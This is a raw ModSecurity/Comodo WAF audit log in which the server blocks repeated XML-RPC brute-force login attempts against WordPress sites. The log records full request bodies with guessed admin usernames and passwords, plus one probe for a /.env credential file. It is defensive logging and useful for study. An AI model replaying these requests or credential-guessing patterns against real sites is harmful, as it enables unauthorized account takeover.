[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 175.117.144.122 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749111929346322 5364 (- - -) Stopwatch2: 1749111929346322 5364; combined=3894, p1=463, p2=3268, p3=0, p4=0, p5=96, sr=86, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09bf297a-Z-- --2976c30b-A-- [05/Jun/2025:15:27:10 +0700] aEFU3irHpfaS2Cuwh8XXuAAAAFQ 103.236.140.4 46488 103.236.140.4 8181 --2976c30b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 175.117.144.122 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 175.117.144.122 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --2976c30b-C-- system.multicallmethodNamewp.getUsersBlogsparamsmatraca1234567890 --2976c30b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2976c30b-E-- --2976c30b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 175.117.144.122 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749112030698358 5626 (- - -) Stopwatch2: 1749112030698358 5626; combined=4051, p1=501, p2=3370, p3=0, p4=0, p5=105, sr=94, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2976c30b-Z-- --57511766-A-- [05/Jun/2025:15:28:34 +0700] aEFVMuth7G2xELALzPYoJQAAANg 103.236.140.4 50692 103.236.140.4 8181 --57511766-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 175.117.144.122 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 175.117.144.122 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --57511766-C-- system.multicallmethodNamewp.getUsersBlogsparamsolivierOlivier123! --57511766-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --57511766-E-- --57511766-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 175.117.144.122 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749112114446612 5460 (- - -) Stopwatch2: 1749112114446612 5460; combined=4321, p1=494, p2=3649, p3=0, p4=0, p5=105, sr=85, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57511766-Z-- --3e5d7261-A-- [05/Jun/2025:15:28:50 +0700] aEFVQuth7G2xELALzPYoVQAAANE 103.236.140.4 51504 103.236.140.4 8181 --3e5d7261-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 159.223.35.88 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 159.223.35.88 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --3e5d7261-C-- system.multicallmethodNamewp.getUsersBlogsparamseditorEditor@123 --3e5d7261-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e5d7261-E-- --3e5d7261-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 159.223.35.88 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749112130504506 5713 (- - -) Stopwatch2: 1749112130504506 5713; combined=4193, p1=481, p2=3533, p3=0, p4=0, p5=104, sr=86, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e5d7261-Z-- --c1224845-A-- [05/Jun/2025:15:29:40 +0700] aEFVdCrHpfaS2Cuwh8XZKAAAAEY 103.236.140.4 54036 103.236.140.4 8181 --c1224845-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 175.117.144.122 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 175.117.144.122 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --c1224845-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix_123 --c1224845-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1224845-E-- --c1224845-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 175.117.144.122 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749112180049192 5298 (- - -) Stopwatch2: 1749112180049192 5298; combined=3923, p1=479, p2=3282, p3=0, p4=0, p5=95, sr=89, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1224845-Z-- --c9ea4b5a-A-- [05/Jun/2025:15:31:57 +0700] aEFV_SrHpfaS2Cuwh8XcGwAAAEc 103.236.140.4 60754 103.236.140.4 8181 --c9ea4b5a-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 134.122.28.88 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 134.122.28.88 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --c9ea4b5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9ea4b5a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749112317698486 682 (- - -) Stopwatch2: 1749112317698486 682; combined=285, p1=248, p2=0, p3=0, p4=0, p5=37, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9ea4b5a-Z-- --4276d00d-A-- [05/Jun/2025:15:38:26 +0700] aEFXgirHpfaS2Cuwh8XhggAAAE8 103.236.140.4 51634 103.236.140.4 8181 --4276d00d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.137 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.137 X-Forwarded-Proto: https Connection: close Content-Length: 490 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --4276d00d-C-- system.multicallmethodNamewp.getUsersBlogsparamscomprasexpressAbcd1234 --4276d00d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4276d00d-E-- --4276d00d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.137 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749112706290194 5534 (- - -) Stopwatch2: 1749112706290194 5534; combined=4136, p1=474, p2=3507, p3=0, p4=0, p5=93, sr=83, sw=62, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4276d00d-Z-- --bffb240d-A-- [05/Jun/2025:15:40:20 +0700] aEFX9H-K7ToMdu-YSIIxCQAAAAA 103.236.140.4 57462 103.236.140.4 8181 --bffb240d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.137 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.137 X-Forwarded-Proto: https Connection: close Content-Length: 475 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --bffb240d-C-- system.multicallmethodNamewp.getUsersBlogsparamsuser123 --bffb240d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bffb240d-E-- --bffb240d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.137 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749112820161229 4451 (- - -) Stopwatch2: 1749112820161229 4451; combined=3023, p1=390, p2=2504, p3=0, p4=0, p5=76, sr=81, sw=53, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bffb240d-Z-- --3c7e1f19-A-- [05/Jun/2025:15:46:15 +0700] aEFZVyrHpfaS2Cuwh8XnXwAAAEA 103.236.140.4 46696 103.236.140.4 8181 --3c7e1f19-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.180.134.27 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.180.134.27 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --3c7e1f19-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix@123$ --3c7e1f19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c7e1f19-E-- --3c7e1f19-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.180.134.27 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749113175694187 5426 (- - -) Stopwatch2: 1749113175694187 5426; combined=3960, p1=489, p2=3312, p3=0, p4=0, p5=98, sr=85, sw=61, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c7e1f19-Z-- --34274961-A-- [05/Jun/2025:15:47:05 +0700] aEFZiH-K7ToMdu-YSII3QwAAABU 103.236.140.4 49148 103.236.140.4 8181 --34274961-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 184.168.99.84 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 184.168.99.84 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --34274961-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix@2025 --34274961-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --34274961-E-- --34274961-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 184.168.99.84 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749113224996842 5896 (- - -) Stopwatch2: 1749113224996842 5896; combined=4497, p1=551, p2=3705, p3=0, p4=0, p5=146, sr=86, sw=95, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --34274961-Z-- --54a5706e-A-- [05/Jun/2025:15:47:15 +0700] aEFZk1wdJdhOudw5hdzeHwAAAIQ 103.236.140.4 49678 103.236.140.4 8181 --54a5706e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.137 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.137 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --54a5706e-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminPa55word --54a5706e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54a5706e-E-- --54a5706e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.137 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749113235957477 6131 (- - -) Stopwatch2: 1749113235957477 6131; combined=4556, p1=526, p2=3771, p3=0, p4=0, p5=146, sr=90, sw=113, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54a5706e-Z-- --52529b08-A-- [05/Jun/2025:15:53:20 +0700] aEFbAH-K7ToMdu-YSII8BQAAABE 103.236.140.4 39856 103.236.140.4 8181 --52529b08-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --52529b08-C-- wp.getUsersBlogs admin 12345678 --52529b08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --52529b08-E-- --52529b08-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749113600208145 5409 (- - -) Stopwatch2: 1749113600208145 5409; combined=3877, p1=462, p2=3221, p3=0, p4=0, p5=110, sr=87, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52529b08-Z-- --c475cc71-A-- [05/Jun/2025:15:54:23 +0700] aEFbP-th7G2xELALzPY5dgAAAMg 103.236.140.4 43162 103.236.140.4 8181 --c475cc71-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --c475cc71-C-- wp.getUsersBlogs admin r007pd8skdgSejrd --c475cc71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c475cc71-E-- --c475cc71-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (69+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749113663178410 5086 (- - -) Stopwatch2: 1749113663178410 5086; combined=3844, p1=447, p2=3227, p3=0, p4=0, p5=100, sr=92, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c475cc71-Z-- --abdaf072-A-- [05/Jun/2025:15:55:14 +0700] aEFbcirHpfaS2Cuwh8XuAgAAAEE 103.236.140.4 45760 103.236.140.4 8181 --abdaf072-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.180.134.27 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.180.134.27 X-Forwarded-Proto: https Connection: close Content-Length: 478 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --abdaf072-C-- system.multicallmethodNamewp.getUsersBlogsparamsorlinOrlin --abdaf072-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --abdaf072-E-- --abdaf072-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.180.134.27 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749113714907653 5994 (- - -) Stopwatch2: 1749113714907653 5994; combined=4254, p1=555, p2=3535, p3=0, p4=0, p5=99, sr=94, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --abdaf072-Z-- --bb6ea129-A-- [05/Jun/2025:15:55:23 +0700] aEFbeyrHpfaS2Cuwh8XuVwAAAFI 103.236.140.4 46170 103.236.140.4 8181 --bb6ea129-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --bb6ea129-C-- wp.getUsersBlogs admin changeme! --bb6ea129-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb6ea129-E-- --bb6ea129-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (40+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749113723276060 5605 (- - -) Stopwatch2: 1749113723276060 5605; combined=4212, p1=470, p2=3365, p3=0, p4=0, p5=203, sr=93, sw=174, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb6ea129-Z-- --9e63de1a-A-- [05/Jun/2025:15:56:26 +0700] aEFbuirHpfaS2Cuwh8XvTQAAAFM 103.236.140.4 49362 103.236.140.4 8181 --9e63de1a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --9e63de1a-C-- wp.getUsersBlogs admin smkn22-jktschid --9e63de1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9e63de1a-E-- --9e63de1a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (60+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749113786660669 5191 (- - -) Stopwatch2: 1749113786660669 5191; combined=3718, p1=450, p2=3100, p3=0, p4=0, p5=99, sr=87, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e63de1a-Z-- --37124b67-A-- [05/Jun/2025:15:57:26 +0700] aEFb9n-K7ToMdu-YSII94QAAABQ 103.236.140.4 52472 103.236.140.4 8181 --37124b67-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --37124b67-C-- wp.getUsersBlogs admin smkn22-jkt_sch_id --37124b67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --37124b67-E-- --37124b67-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (69+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 